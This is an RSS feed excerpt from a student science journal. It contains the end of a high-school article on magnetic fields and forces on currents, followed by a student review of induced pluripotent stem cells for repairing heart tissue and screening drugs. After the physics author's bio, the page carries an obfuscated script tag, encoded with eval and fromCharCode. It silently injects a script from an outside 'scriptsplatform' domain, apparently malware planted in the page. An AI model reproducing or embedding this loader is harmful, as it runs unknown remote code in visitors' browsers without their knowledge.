<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-54.png" alt="" class="wp-image-2073" width="145" height="50" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-54.png 237w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-54-230x80.png 230w" sizes="(max-width: 145px) 100vw, 145px" /></figure>



<p>Where V<sub>r</sub>&nbsp; is the voltage across the resistor and I is the current in the resistor.</p>



<h2 class="wp-block-heading"><strong>Part 3</strong></h2>



<h4 class="wp-block-heading"><strong>3.1 What are magnetic poles?</strong></h4>



<p>Of a bar magnet, one end is called a north pole or N pole, and the other end is called a south pole or S pole. Opposite poles attract each other, and like poles repel each other. This is similar to electric interactions. We can also describe the interactions between two magnets as one sets up a magnetic field around it, and the other magnet moves in response to the magnetic field.</p>



<h4 class="wp-block-heading"><strong>3.2 Is the Earth a magnet?</strong></h4>



<p>In early years, people sail with a compass which always points to the north. The Earth’s north is defined by the direction of the compass’s north points. As a result, Earth’s geographic north pole is like a magnet’s south pole, which attracts the compass’s north pole. The earth’s magnetic axis, though, is not parallel to its rotation axis, so the compass’s reading derivates a little from the true north.&nbsp;</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-55.png" alt="" class="wp-image-2074" width="437" height="351" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-55.png 672w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-55-300x241.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-55-230x184.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-55-350x281.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-55-480x385.png 480w" sizes="(max-width: 437px) 100vw, 437px" /><figcaption><br><strong>Figure 3.1</strong> the earth’s magnetic field</figcaption></figure>



<h4 class="wp-block-heading"><strong>3.3 Magnetic field lines</strong></h4>



<p>While magnetic poles may be similar to electric charges, unlike isolated positive and negative charges, magnetic poles always exist in pairs. When a magnet is broken to two, each end becomes a new pole. The magnetic poles in pair are called a magnetic dipole, and an isolated magnetic pole is called magnetic monopole, which is not yet discovered.</p>



<p>Magnetic field lines emerge from the north pole and go into the south pole. Different from electric field lines, magnetic field lines do not end at the south pole, instead, they form a circle back to the north pole.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-56-1024x465.png" alt="" class="wp-image-2075" width="673" height="305" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-1024x465.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-300x136.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-768x349.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-920x418.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-230x104.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-350x159.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56-480x218.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-56.png 1165w" sizes="(max-width: 673px) 100vw, 673px" /><figcaption><br><strong>Figure 3.2</strong> magnetic field lines and electric field lines</figcaption></figure>



<p>If we put a magnetic dipole in a magnetic field, the magnetic dipole tends to align with the magnetic field at its position due to magnetic attraction forces and repulsion forces.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-57.png" alt="" class="wp-image-2076" width="640" height="411" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-57.png 664w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-57-300x192.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-57-230x148.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-57-350x225.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-57-480x308.png 480w" sizes="(max-width: 640px) 100vw, 640px" /><figcaption><br><strong>Figure 3.3</strong> The behavior of magnetic dipoles in a magnetic field is also similar to that of electric dipole</figcaption></figure>



<h4 class="wp-block-heading"><strong>3.4 An unexpected effect</strong></h4>



<p>The first evidence of the relationship of magnetism and electric current was discovered by Danish scientist Hans Christian Oersted. When he was giving a lecture, he surprisingly found a compass needle was deflected by a current-carrying wire. When the wire carries current, a compass placed directly over the horizontal wire deflects. As shown in figure 4, when the current is towards north, the needle deflects towards northeast.&nbsp;</p>



<p>The electric and magnetic interactions in this case around a straight, current-carrying wire forms circular magnetic fields. The magnetic field’s direction is determined by a right-hand rule. Point the thumb of your right hand in the direction of the current. Your fingers now curling around the wire in the direction of magnetic field lines.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-58.png" alt="" class="wp-image-2077" width="524" height="220" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-58.png 612w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-58-300x126.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-58-230x97.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-58-350x147.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-58-480x202.png 480w" sizes="(max-width: 524px) 100vw, 524px" /><figcaption><br><strong>Figure 3.4</strong> When the wire carries a current, the compass needle deflects.</figcaption></figure>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-59.png" alt="" class="wp-image-2078" width="548" height="306" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-59.png 658w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-59-300x167.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-59-230x128.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-59-350x195.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-59-480x268.png 480w" sizes="(max-width: 548px) 100vw, 548px" /><figcaption><br><strong>Figure 3.5</strong> The right-hand rule gives direction of the magnetic field lines that encircles a current-carrying wire.</figcaption></figure>



<h4 class="wp-block-heading"><strong>3.5 The magnetic force on a current-carrying wire</strong></h4>



<p>Since there are magnetic fields near a current, will this magnetic field exert a force to another current-carrying wire?</p>



<p>Ampere discovered that there is a force exerted to another current-carrying wire due to the magnetic field around the original wire. Ampere first ensured the force are not mainly caused by electrostatic effects. Then, he found out the magnetic force between two wires is proportional to the currents and inversely proportional to the distance r between the two wires.</p>



<p>This relationship can be expressed as:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.52.31-AM.png" alt="" class="wp-image-2079" width="120" height="64" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.52.31-AM.png 388w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.52.31-AM-300x159.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.52.31-AM-230x122.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.52.31-AM-350x186.png 350w" sizes="(max-width: 120px) 100vw, 120px" /></figure>



<p>where constant <em>k&#8217;</em>&nbsp; is equal to <img loading="lazy" decoding="async" width="100" height="55" class="wp-image-2082" style="width: 100px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.53.18-AM.png" alt="" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.53.18-AM.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.53.18-AM-300x166.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.53.18-AM-230x127.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.53.18-AM-350x194.png 350w" sizes="(max-width: 100px) 100vw, 100px" />&nbsp; , I1 and and I2 are the current flowing through each of the wire, respectively, and l is the length of the wire. &nbsp; is the force per unit length of the wire. The longer the wires, the greater the force. The force between the wires is attractive when the currents are flowing in the same direction and repulsive when the currents are flowing in the opposite directions.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-60.png" alt="" class="wp-image-2083" width="454" height="256" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-60.png 617w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-60-300x169.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-60-230x130.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-60-350x197.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-60-480x271.png 480w" sizes="(max-width: 454px) 100vw, 454px" /><figcaption><strong>Figure 3.6</strong> The direction of forces on each other depends on the direction of currents</figcaption></figure>



<h4 class="wp-block-heading"><strong>3.6 The magnetic force on moving charges</strong></h4>



<p>By experiments, we know that the magnetic force on a moving charge is proportional to the magnitudes of the charge. When its charge doubles, the magnetic force doubles. The force is also proportional to the magnetic field strength. If the magnetic field is stronger while the charge remains the same, the force is stronger. If we have a moving charge q which moves through a magnetic field B then the magnetic force also depends on the velocity of the charge. If the charge is at rest, it experiences no magnetic forces. At last, the force is only related to the component of velocity <img loading="lazy" decoding="async" width="25" height="21" class="wp-image-2084" style="width: 25px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.56.55-AM.png" alt="">&nbsp; that is perpendicular to the field. When <img loading="lazy" decoding="async" width="25" height="21" class="wp-image-2084" style="width: 25px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.56.55-AM.png" alt=""> is parallel to the magnetic field, the force is zero.</p>



<p>The magnitude of magnetic force is given by:&nbsp;</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-1024x185.png" alt="" class="wp-image-2085" width="348" height="62" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-1024x185.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-300x54.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-768x138.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-920x166.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-230x41.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-350x63.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM-480x87.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-11.00.03-AM.png 1054w" sizes="(max-width: 348px) 100vw, 348px" /></figure>



<p>Since<img loading="lazy" decoding="async" width="25" height="21" class="wp-image-2084" style="width: 25px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.56.55-AM.png" alt="">and <img loading="lazy" decoding="async" width="25" height="28" class="wp-image-2086" style="width: 25px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.57.08-AM.png" alt=""> are vectors, the direction of their product <img loading="lazy" decoding="async" width="25" height="29" class="wp-image-2087" style="width: 25px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-29-at-10.57.15-AM.png" alt=""> can be determined by a right-hand rule. First, point the index finger of your right hand in the direction of the velocity of the positive charge. Then, point the middle finger in the direction of the magnetic field. The direction of the thumb is then the direction of the magnetic force. The force on a negative charge is in the opposite direction of a positive charge moving in the same direction.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-61.png" alt="" class="wp-image-2088" width="564" height="259" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-61.png 648w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-61-300x138.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-61-230x105.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-61-350x160.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-61-480x220.png 480w" sizes="(max-width: 564px) 100vw, 564px" /><figcaption><strong>Figure 3.7</strong> The magnetic force on the moving charges is perpendicular to the plane of v and B</figcaption></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="657" height="352" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-62.png" alt="" class="wp-image-2089" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-62.png 657w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-62-300x161.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-62-230x123.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-62-350x188.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-62-480x257.png 480w" sizes="(max-width: 657px) 100vw, 657px" /><figcaption><br><strong>Figure 3.8</strong> Right-hand rule for the direction of magnetic force on a positive charge moving in a magnetic field</figcaption></figure>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Zixuan Wang</h5><p>Zixuan is currently an 11th grade student at the Shanghai Jianping High School. </p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/the-differentiating-impacts-of-electricity-and-electromagnetism-on-force-and-magnetic-fields/">The Differentiating Impacts of Electricity and Electromagnetism on Force and Magnetic Fields.</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Using induced pluripotent stem cells for tissue regeneration in cardiovascular diseases</title>
		<link>https://exploratiojournal.com/using-induced-pluripotent-stem-cells-for-tissue-regeneration-in-cardiovascular-diseases/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=using-induced-pluripotent-stem-cells-for-tissue-regeneration-in-cardiovascular-diseases</link>
		
		<dc:creator><![CDATA[Rishya Gutti]]></dc:creator>
		<pubDate>Fri, 04 Feb 2022 10:06:54 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[biology]]></category>
		<category><![CDATA[cardiovascular health]]></category>
		<category><![CDATA[medicine]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[Science]]></category>
		<category><![CDATA[stem cell therapy]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1245</guid>

					<description><![CDATA[<p>Rishya Gutti<br />
Neuqua Valley High School</p>
<p>The post <a href="https://exploratiojournal.com/using-induced-pluripotent-stem-cells-for-tissue-regeneration-in-cardiovascular-diseases/">Using induced pluripotent stem cells for tissue regeneration in cardiovascular diseases</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-1024x1024.jpeg" alt="" class="wp-image-1248 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-1024x1024.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-300x300.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-150x150.jpeg 150w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-768x768.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-920x920.jpeg 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-230x230.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-350x350.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084-480x480.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/IMG_2544-e5ca5f472fc7739aaae9663cec79c084.jpeg 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: </strong>Rishya Gutti<br><strong>Mentor</strong>: Dr. Fabiola Munarin<br><em>Neuqua Valley High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>Heart attacks, or Myocardial Infarctions (MI), lead to death of tissue due to lack of blood supply to the portion of the organ. Resulting scar tissue does not contract or function as well as healthy muscle tissue. On the other hand, stem cells have shown propensity to be guided into becoming specific cells that can be used to regenerate and repair diseased or damaged tissues in people. This paper will explore the latest research that supports using induced pluripotent stem cells for tissue reparation in cardiovascular disease.</p>



<h2 class="wp-block-heading">Introduction</h2>



<p>Over the past few decades, stem cell therapies have evolved considerably and one of their many potential applications could be to repair the scarring caused by myocardial infarctions. Myocardial Infarction (MI), which is a reduction or blockage of blood flow in the coronary arteries, commonly referred to as heart attack, is one of the leading causes of death in the United States with 805,000 people experiencing one every year (CDC). Unfortunately, out of those 805,000, 12% will die (CDC). Following MI, the inadequate blood flow to the infarcted tissue causes a severe reduction of oxygen and nutrients, leading to cardiomyocyte necrosis (reduced contractility), and therefore compromised heart function. MI does not traditionally have any treatment since once the tissue has necrotized, it can not regain its function. MI’s can only be managed with preventative measures taken to inhibit another incident. Medicines like aspirin and other anti-clotting drugs are used to keep clots from forming and causing another MI (CDC). ACE inhibitors reduce the strain on the heart by lowering blood pressure and this helps to not weaken the damaged tissues any further (NIH). Similarly, Betablockers also reduce the strain on the organ by blocking the release of stress hormones like noradrenaline and adrenaline to keep heart rate constant (NIH). All of these, however, only reduce the risk of a recurrence and do not regenerate the dead tissue, whereas a different form of therapy for the damaged tissue could bring about a brighter prospect. Stem cells can regenerate tissues suitable to one’s own body without having to use a transplant. This makes it less risky when it comes to a patient&#8217;s body rejecting the cells. Some varieties are also easily accessible, usable, and effective in their respective needs.</p>



<p>Out of the many varieties of stem cells, induced pluripotent stem cells, are some of the most promising to study. Induced pluripotent stem cells (iPS cells) are derived from somatic cells that are reprogrammed into iPS cells. These cells can then be made to differentiate into whatever tissue cell is needed (Shi et al, 2016). They are also important to observe because of their accessibility and high turnover rate (Krzysztof et al, 2018). In this review, we will focus on two types of stem cells: induced pluripotent stem cells, and their abilities in tissue regeneration in regards to therapies to treat the infarcted myocardium (Yoshida et al, 2017).</p>



<h2 class="wp-block-heading">Induced Pluripotent Stem cells</h2>



<p>Induced Pluripotent Stem Cells (iPSCs) are adult somatic cells that are reprogrammed into a pluripotent state. These cells are adults and unipotent, meaning they are capable of regenerating only their own specific tissue type (Tweedell, 2017). For example, an adult somatic cell in the skin could only generate skin cells. When these cells are reprogrammed into iPSCs, they become pluripotent, and are able to differentiate into any type of tissue with appropriate differentiation factors (Tweedell, 2017).</p>



<p>The use of iPSCs for regenerative medicine bears significant advantages. In fact, the somatic cells generally used for reprogramming are highly accessible and they are already part of the body of the person who needs them. Therefore, there is no risk of rejection when they are implanted for regenerating damaged tissues or organs (Arjmand et al, 2017). One further advantage is that they are not controversial like embryonic stem cells that are isolated from embryos while having similar properties. Generating the iPSCs is completed by taking any healthy adult somatic cells from the body and reverse engineering them into a pluripotent state where they can then differentiate into whatever cell type is needed. How this occurs is that first, the cells organize spatially and then divide into three areas. The middle section, differentiates into the middle portion of the three’s lineage and this activates certain genes.</p>



<h2 class="wp-block-heading">Cardiovascular Regeneration</h2>



<p>As mentioned above, one of the capabilities of iPSCs is tissue regeneration, which is paramount for cardiovascular tissue regeneration. The basic process for cardiovascular tissue engineering consists in isolating somatic cells of the patient or from healthy donors, which are then reprogrammed to iPSCs. Next, the obtained iPSCs are differentiated into the specific cell type that is needed (such as cardiomyocytes, cardiac fibroblasts, or endothelial cells). The differentiated cells must be cultured in the lab to grow, and during this process they can be stimulated with chemical or physical cues to mimic the mechanical properties of the beating heart. The last step is to inject or implant the cells into the patient.</p>



<p>Cardiovascular tissue engineering has shown promising results in vitro and in preclinical in vivo studies. Several groups have used small animal models, including mice and rats model of myocardial infarction to assess the ability of repairing the damaged heart tissue with iPSCs-derived cardiomyocytes. An example of implantation of cardiac engineered tissues in a small animal model is provided by (Tompkins et. al. 2018), that used 3D bioprinted iPSC-derived cardiomyocytes, fibroblasts and endothelial cells to produce 3D patches that were implanted in n=6 infarcted rats.</p>



<p>Additionally, vivo models further demonstrate that this path of study is incredibly promising. The work of Tompkins et. al. describes small animal models where iPSCs are implanted. This article demonstrates how this work is viable in live models as they tested various species of small animals to prove efficacy. Moreover, the same study considered large animal studies and deduced that they too have promising results. More specifically, in swine models, which are known to have extremely similar cardiac structure to that of humans, these studies further the thought that using iPSCs to repair tissues is a viable solution. Kawamura et al. placed a sheet of dermal fibroblast-derived hiPSC-CMs over the infarcted area in an ischemic swine model, which produced improved cardiac performance, angiogenesis (increased number of blood vessels in the infarct), and an attenuated LV remodeling 8-weeks post implantation.</p>



<p>While in the lab, stimuli of stretching and current are used to help the cells mature faster and grow more resilient. This is one place of research that is continuing to challenge researchers, since they do not have years to culture mature cells and there is risk with implanting immature cells regarding their ability to adapt to the heart’s environment. However, it can and has been done, as explained above, which has drawn tremendous attention to this field of pursuit. Moreover, cardiovascular regeneration is one of the newest technologies in repairing damaged tissues in the heart. This breakthrough has made it possible to just regrow healthy and functional tissue instead of needing a transplant since it is already known that once tissue is dead from a myocardial infarction, there is no way to salvage it. As the MI damages the tissue, it makes it impossible for the original tissue to be functional, so inputting fresh, cultivated tissues open up new possibilities in life for the patient after their MI episode.</p>



<h2 class="wp-block-heading">Drug Screening</h2>



<p>During the process of drug screening, various drugs are tested on the cardiac engineered tissues to gauge safety and efficacy of the tested molecules and drugs. One of the commonly tested side effects of newly developed drugs are for drug induced arrhythmias. By testing in-vitro with iPSCs outside of a patient’s body, it is not only more convenient to do so but also safer so as to not involve a live subject (Smith et. al. 2017). Various types of cell models are used, ranging from flat, 2D monolayers to more complex 3D tissues, organ-on-a-chip models show a wide range of functionality. Each of these model types show a range from the least to most complex levels of organization in order to understand how drugs can affect the cardiomyocytes on a basic to fully vascularized level (Smith et. al. 2017 Fig. 1). This is one place of development in the field of iPSCs that would be of great benefit to the scientific community and to the general population as well. If drugs can be screened and tested within a lab without having to use in vivo models until much later in the process, it can be much more ethical and more varieties of medicines that may or may not be viewed as viable could potentially be trialed in this way due to the reduced ethics concerns.</p>



<p>One example of a clinical trial is in the research of Blinova et. al. which shows a personalized drug screen model that highlights how iPSCs derived from 22 healthy subjects can be grown and tested within a dish. Safety and efficacy of two drugs, dofetilide and moxifloxacin (hERG‐blocking and QT prolonging), were tested on iPSCs isolated from the peripheral blood mononuclear cells and differentiated in cardiomyocytes. There were no drug induced arrhythmia-like events observed at the studied drug concentration rate. In vivo model of testing that highlights how tissue can be grown and tested within a dish. In this trial, the researchers tested and analyzed for arrhythmias in the iPSCs. This demonstrates how various environments of the heart can be simulated in the lab and that it is necessary to do   so (Blinova et. al. 2019)</p>



<p>Various different types of trials can be used to screen for arrhythmias in a drug screening. One method researchers historically and commonly use is the analysis of hERG channel response which is the standard procedure for in vitro preclinical trials of drug screening. While this is a method commonly used, it is not as accurate as could be desired since false positive results are frequent occurrences (Smith et. al. 2017). This is why iPSC-CMs are making headway in the field of drug screening since they offer a more accurate option. There are various tests researchers can run with in vitro models of iPSCs to represent the function of the heart more fully and effectively. Out of the multitude of options researchers now have with iPSC-CMs as an option, an example presented in the above research is that researchers measure cell contraction to observe the cardiomyocytes’ contractile function (Smith et. al. 2017).</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>After an episode of myocardial infarction, heart tissue is damaged irreversibly and the prognosis only entails either drug therapeutics or organ transplant. Cardiovascular regeneration is one of the newest technologies in regards to repairing damaged tissues in the heart. With reprogrammed iPSCs , the patient is able to have their healthy cells cultured in a lab and remediate the scarred tissue resulting from an MI episode. Furthermore, progress has also been made in labs to accommodate the new research and to screen drugs to ensure their safety with the cultured tissues when implanted in a person. All together, these breakthroughs have made it possible to regrow healthy and functioning tissue and using iPSCs could make this possibility a reality.</p>



<h2 class="wp-block-heading">References</h2>



<p>Arjmand B, Goodarzi P, Mohamadi-Jahani F, Falahzadeh K, Larijani B. Personalized Regenerative Medicine. Acta Med Iran. 2017 Mar;55(3):144-149.</p>



<p>Blinova K, Schocken D, Patel D, Daluwatte C, Vicente J, Wu JC, Strauss DG. Clinical Trial in a Dish: Personalized Stem Cell-Derived Cardiomyocyte Assay Compared With Clinical Trial Results for Two QT-Prolonging Drugs. Clin Transl Sci. 2019 Nov;12(6):687-697.</p>



<p>CDC, Heart Disease in the United States, 2020 Sept.</p>



<p>Csöbönyeiová M, Polák Š, Danišovič L. Perspectives of induced pluripotent stem cells for cardiovascular system regeneration. Exp Biol Med (Maywood). 2015 May;240(5):549-56.</p>



<p>Hoang P, Wang J, Conklin BR, Healy KE, Ma Z. Generation of spatial-patterned early-developing cardiac organoids using human pluripotent stem cells. Nat Protoc. 2018 Apr;13(4):723-737.</p>



<p>Justin Liu, Kathleen Miller, Xuanyi Ma, Sukriti Dewan, Natalie Lawrence, Grace Whang, Peter Chung, Andrew D. McCulloch, Shaochen Chen,Direct 3D bioprinting of cardiac micro-tissues mimicking native Biomaterials, Volume 256, 2020, 120204, ISSN 0142-9612myocardium,</p>



<p>Kawamura M, Miyagawa S, Miki K, Saito A, Fukushima S, Higuchi T, Kawamura T, Kuratani T, Daimon T, Shimizu T, Okano T, Sawa Y. Feasibility, safety, and therapeutic efficacy of human induced pluripotent stem cell-derived cardiomyocyte sheets in a porcine ischemic cardiomyopathy model. Circulation. 2012 Sep 11;126(11 Suppl 1):S29-37.</p>



<p>Madigan M, Atoui R. Therapeutic Use of Stem Cells for Myocardial Infarction. Bioengineering (Basel). 2018 Apr 6;5(2):28</p>



<p>Müller P, Lemcke H, David R. Stem Cell Therapy in Heart Diseases &#8211; Cell Types, Mechanisms andImprovement Strategies. Cell Physiol Biochem. 2018;48(6):2607-2655.</p>



<p>NIH, What is a Heart Attack?, 2018 June.</p>



<p>Polonchuk L, Chabria M, Badi L, Hoflack JC, Figtree G, Davies MJ, Gentile C. Cardiac spheroids as promising in vitro models to study the human heart microenvironment. Sci Rep. 2017 Aug 1;7(1):7005.</p>



<p>Rikhtegar R, Pezeshkian M, Dolati S, Safaie N, Afrasiabi Rad A, Mahdipour M, Nouri M, Jodati AR, Yousefi M. Stem cells as therapy for heart disease: iPSCs, ESCs, CSCs, and skeletal myoblasts. Biomed Pharmacother. 2019 Jan;109:304-313.</p>



<p>Shi Y, Inoue H, Wu JC, Yamanaka S. Induced pluripotent stem cell technology: a decade of progress. Nat Rev Drug Discov. 2017 Feb;16(2):115-130.</p>



